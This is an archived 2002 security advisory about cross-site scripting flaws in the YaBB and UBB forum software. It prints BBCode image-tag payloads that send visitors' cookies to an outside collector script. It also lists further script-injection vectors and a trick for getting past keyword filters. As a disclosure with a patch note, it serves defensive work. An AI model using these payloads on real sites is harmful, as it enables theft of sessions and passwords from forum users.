Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: web4988.htm

YaBB and UBB - embedded javascript can steal cookies



10th Jan 2002 [SBWID-4988]
COMMAND

	YaBB and UBB

SYSTEMS AFFECTED

	YaBB v1 Gold/SP 1 and older UBB 6.2.0 Beta Release 1.0

PROBLEM

	In                         \"Obscure^\"                         advisory
	[http://eyeonsecurity.net/advisories/css_in_yabb_and_ubb.html] :
	

	

	When a user inserts [IMG]url[/IMG], YaBB changes that  text  to  <img
	src=\'url\'>. If someone inserts javascript:alert() instead of the  url,
	the javascript code is executed by Internet Explorer or some  other  web
	browsers. This allows stealing of  cookie  data  and  other  interesting
	things. YaBB has filtered the javascript method,  however  it  does  not
	take into consideration that javascript: can be encoded  using  standard
	HTML hex and ASCII encoding. Same with UBB.
	

	In UBB I need to encode several strings because they added checking  for
	certain keywords such as cookie. In my example I change  javascript:  to
	javascript:
	

	 Exploit

	

	Inserting a new topic (or reply)  with  the  following  text  will  send
	visitor\'s  cookies  to  Eye  on  Security.  The  output  is  saved   to
	http://eyeonsecurity.net/tools/cookies.txt . Cookies  will  contain  the
	password in the case of UBB and a session cookie (or  encoded  password)
	in YaBB.
	

	-- snap YaBB --

	

	[img]javascript:document.write

	(\'&#x3cimg

	src=http://eyeonsecurity.net/tools/cookie.plx?cookie=\'+escape(docu

	ment.cookie)+\'&#x3e\')

	[/img].

	

	-- snap YaBB --

	

	-- snap UBB --

	

	[IMG]javascript:document.write

	(\'<img%20src=http://eyeonsecurity.net/tools/cookie.plx?

	

	cookie=\'+escape(document.cookie)+\'>\')

	[/IMG]

	

	-- snap UBB --

	

	

	

	 Update

	 ======

	

	Obscure added more ways to circumvent YaBB & UBB :
	

	  <body onload=\"alert()\">

	

	  <link rel=\"stylesheet\" href=\"javascript:alert()\">

	

	  <p style=\"width: expression(alert())\">

	

	(works on IE thanks to dynamic properties, executes immediately.)

	

	  <img src=\"vbscript:alert\">

	

	(javascript: is not the only potentially harmful kind of URL)

	

	  <a href=\"about:<script>alert()\">

	

	(another one for IE)

	

	  <a href=&{location=\'stealcookie.cgi?\'};>

	

	(one for Netscape 4, so it doesn\'t feel left out.)

	

	

	All the above can be made  to  steal  cookies  -  filtering  the  string
	\"document.cookie\" does no good whatsoever since one can just  as  well
	do \"document[\'coo\'+\'kie\']\". I\'m sure there are many more holes  I
	missed.

SOLUTION

	Check web sites, patch should be out soon :
	

	

	 http://yabb.xnull.com

	 http://www.infopop.com/products/ubb/

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH